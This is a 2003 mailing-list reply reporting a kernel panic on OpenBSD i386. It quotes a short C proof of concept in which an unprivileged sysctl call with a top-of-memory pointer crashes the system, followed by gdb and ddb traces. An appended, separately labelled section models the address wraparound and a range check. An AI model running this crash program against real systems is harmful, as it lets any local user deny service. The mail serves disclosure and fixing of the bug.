
Re: i386 local DoS with un-priv user



On Thu, 20 Nov 2003, Sanitized wrote:

> Hello,
>
> Tested with 3.3-stable.
>
> A low priv user, results in a system crash.
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main(void)
> {
> 	/* oldp is a user pointer just below the top of the 32-bit address
> 	 * space, where nothing is mapped for this process; *oldlenp is 0 */
> 	int name[2] = { CTL_KERN, 0 };
> 	size_t oldlen = 0;
> 	void *addr = (void *)(-4096 + 1);
>
> 	return (sysctl(name, 2, addr, &oldlen, NULL, 0));
> }
>
> Just:
>
> $ cc problem.c -o problem && ./problem
>
> I've not coded it, so don't give me credit.
>
> Just fix it.

# gdb
GNU gdb 4.16.1
Copyright 1996 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-openbsd3.4".
(gdb) file /var/crash/bsd.0
Reading symbols from /var/crash/bsd.0...(no debugging symbols found)...done.
(gdb) target kcore /var/crash/bsd.0.core
panic: uvm_fault_unwire_locked: address not in map
#0  0x1000 in ?? ()
(gdb) where
#0  0x1000 in ?? ()
#1  0xd02dad92 in boot ()
#2  0xd0194743 in db_boot_dump_cmd ()
#3  0xd0194387 in db_command ()
#4  0xd01945ab in db_command_loop ()
#5  0xd019743a in db_trap ()
#6  0xd02d79ad in kdb_trap ()
#7  0xd02e23d9 in trap ()
#8  0xd0100ced in alltraps ()
#9  0xd01c6b73 in panic ()
#10 0xd02a63c9 in uvm_fault_unwire_locked ()
#11 0xd02a6322 in uvm_fault_unwire ()
#12 0xd02a6642 in uvm_vsunlock ()
#13 0xd01be22c in sys___sysctl ()
#14 0xd02e2b69 in syscall ()
#15 0xd0100d93 in Xosyscall_end ()
can not access 0xcfbf10a4, invalid address (cfbf10a4)
can not access 0xcfbf10a4, invalid address (cfbf10a4)
Cannot access memory at address 0xcfbf10a4.
(gdb) quit


I cannot easily copy/paste ddb output, so here is some manual overtyping
(typos are possible):
panic: uvm_fault_unwire_locked: address not in map
Stopped at      Debugger+0x4:    leave
RUN AT LEAST 'trace' AND 'ps' AND INCLUDE OUTPUT WHEN REPORTING THIS PANIC!
DO NOT EVEN BOTHER REPORTING THIS WITHOUT INCLUDING THAT INFORMATION!
ddb> trace
Debugger(fffff000,d79d7d40,d7ae9ff88,fffff000,d79d7d40) at Debugger+0x4
uvm_fault_unwire_locked(d79d7d40,fffff000,0,d7aea148,d7ae9ef4) at uvm_fault_unwire_locked+0x8d
uvm_fault_unwire(d79d7d40,fffff000,d01be209,d7ae9efc) at uvm_fault_unwire+0x4a
uvm_vsunlock(d7aea148,fffff001,0,3) at uvm_vsunlock+0x2e
sys___sysctl(d7aea148,d7ae9f88,d7ae9f7c,70,209b3900) at sys___sysctl+0x200
syscall() at syscall+0x21d
--- syscall (number 202) ---
0x9d263d:
ddb>

BTW this is on i386 3.4-current of Sat Oct 25


Cheers,

Dries
--
Dries Schellekens
email: gwyllion_(_at_)_ulyssis_(_dot_)_org
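The ddb trace above shows uvm_vsunlock() being handed oldp = 0xfffff001 with length 0 and uvm_fault_unwire() then walking from 0xfffff000. As an added example (not code from this report or from OpenBSD), here is a user-space model of why such a range has to be validated before any page is wired: on a 32-bit address space, rounding the end of a range that sits at the very top of memory wraps to 0, and a hardened check rejects addresses outside the user map and wrapping lengths up front. The page size and the VM_MIN_USER/VM_MAX_USER bounds are assumed constants, not the kernel's real ones.

```c
#include <errno.h>
#include <stdint.h>

/* Constructed 32-bit model of an i386-style address space. The page size and
 * the user-space bounds are assumptions for illustration, not OpenBSD's real
 * VM_MIN_ADDRESS / VM_MAXUSER_ADDRESS. */
#define PAGE_SIZE   0x1000u
#define PAGE_MASK   (PAGE_SIZE - 1)
#define VM_MIN_USER 0x1000u        /* assumed: page 0 is never user-mapped */
#define VM_MAX_USER 0xcfbff000u    /* assumed: end of the user half */

struct page_range { uint32_t start, end; };  /* [start, end), page aligned */

static uint32_t trunc_page(uint32_t a) { return a & ~PAGE_MASK; }
static uint32_t round_page(uint32_t a) { return (a + PAGE_MASK) & ~PAGE_MASK; }

/* What a lock/unlock helper computes if it rounds first and validates nothing.
 * For the report's oldp = -4095 (0xfffff001) and length 0, round_page() wraps
 * to 0, so end < start and a page walk starts outside any user mapping. */
struct page_range naive_page_range(uint32_t addr, uint32_t len)
{
    struct page_range r = { trunc_page(addr), round_page(addr + len) };
    return r;
}

/* Validate a user buffer before wiring it: returns 0 and fills *out, or EFAULT.
 * A zero-length request (a size query) touches no memory, so nothing is wired. */
int user_range_check(uint32_t addr, uint32_t len, struct page_range *out)
{
    uint32_t end;

    if (len == 0) {
        out->start = out->end = 0;
        return 0;
    }
    if (addr < VM_MIN_USER || addr >= VM_MAX_USER)
        return EFAULT;                 /* start is not a user address */
    if (len > UINT32_MAX - addr)
        return EFAULT;                 /* addr + len would wrap around */
    end = addr + len;
    if (end > VM_MAX_USER)
        return EFAULT;                 /* buffer runs past user space */
    out->start = trunc_page(addr);
    out->end = round_page(end);        /* end <= VM_MAX_USER: cannot wrap */
    return 0;
}
```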


